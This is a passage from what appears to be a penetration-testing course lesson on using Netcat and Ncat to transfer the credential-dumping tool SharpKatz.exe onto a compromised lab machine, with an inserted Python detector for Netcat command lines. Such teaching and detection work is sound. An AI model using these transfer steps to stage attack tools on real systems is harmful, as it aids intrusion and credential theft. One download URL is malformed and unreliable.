Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP, which means that we can use it for file transfer operations.

The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.

File Transfer with Netcat and Ncat

Either the target or the attacking machine can initiate the connection, which is helpful if a firewall prevents access to the target.

We'll transfer SharpKatz.exe from our Pwnbox onto the compromised machine. We'll do it using two methods. Let's work through the first one.

We'll first start Netcat (nc) on the compromised machine, listening with the option -l, selecting the port to listen on with the option -p 8000, and redirecting stdout using a single greater-than > followed by the filename, SharpKatz.exe.

Netcat - Compromised Machine - Listening on Port 8000

# Example using Original Netcat
nc -l -p 8000 > SharpKatz.exe

# If the compromised machine is using Ncat, we'll need to specify --recv-only to close the connection once the file transfer is finished.
# Example using Ncat
ncat -l -p 8000 --recv-only > SharpKatz.exe

Netcat - Attack Host - Sending File to Compromised Machine

From our attack host, we'll connect to the compromised machine on port 8000 using Netcat and send the file SharpKatz.exe as input to Netcat. The option -q 0 tells Netcat to close the connection once it finishes. That way, we'll know when the file transfer has completed.

wget -q https://github.com/SharpKatz.exe
# Example using Original Netcat
nc -q 0 192.168.49.128 8000 < SharpKatz.exe

If we're using Ncat on our attack host, we can opt for --send-only rather than -q. The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. Typically, Ncat would continue running until the network connection is closed, as the remote side may transmit additional data. However, with --send-only, there is no need to anticipate further incoming information.

Ncat - Attack Host - Sending File to Compromised Machine

wget -q https://github.com/SharpKatz.exe
# Example using Ncat
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
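
From the defender's side, the transfers above show up in process-creation telemetry only as Netcat/Ncat arguments: the shell handles the > and < redirections, so the filename never appears in the process arguments. The following Python sketch is an added example, not part of the original material; it classifies command lines by the flags used on this page (-l, -p, -q, --recv-only, --send-only) and goes slightly further by handling clustered short flags such as -lvnp. The function names and sample events are constructed for illustration.

```python
import shlex

NC_NAMES = {"nc", "netcat", "ncat"}

def _port(value):
    return int(value) if value.isdigit() else None

def classify(cmdline):
    """Return a finding dict for a Netcat/Ncat command line, else None."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1].lower() not in NC_NAMES:
        return None
    found = {"mode": "connect", "peer": None, "port": None, "one_way": []}
    positional, args, i = [], argv[1:], 0
    while i < len(args):
        arg = args[i]
        if arg in ("--recv-only", "--send-only"):
            found["one_way"].append(arg)
        elif arg.startswith("-") and not arg.startswith("--"):
            if "l" in arg[1:]:
                found["mode"] = "listen"
            # -p and -q take a value, so they end a cluster such as -lvnp
            if arg[-1] in "pq" and i + 1 < len(args):
                i += 1
                if arg[-1] == "p":
                    found["port"] = _port(args[i])
                else:
                    found["one_way"].append("-q " + args[i])
        elif not arg.startswith("-"):
            positional.append(arg)
        i += 1
    if found["mode"] == "connect" and len(positional) >= 2:
        found["peer"], found["port"] = positional[0], _port(positional[1])
    elif found["mode"] == "listen" and found["port"] is None and positional:
        found["port"] = _port(positional[-1])  # e.g. OpenBSD-style "nc -l 8000"
    return found

# Constructed process-creation records (argv only), modelled on this page.
SAMPLE_EVENTS = [
    "nc -l -p 8000",
    "/usr/bin/ncat -l -p 8000 --recv-only",
    "nc -q 0 192.168.49.128 8000",
    "ncat --send-only 192.168.49.128 8000",
    "wget -q https://example.invalid/file",
]

def scan(events):
    return [(e, f) for e in events if (f := classify(e)) is not None]

if __name__ == "__main__":
    for event, finding in scan(SAMPLE_EVENTS):
        print(event, "->", finding)
```

A listener paired with a one-way flag (--recv-only, or -q / --send-only on the connecting side) is the signature of a file transfer rather than an interactive session, which makes the one_way field the useful pivot when triaging hits.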

Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our Pwnbox and send the file SharpKatz.exe as input to Netcat.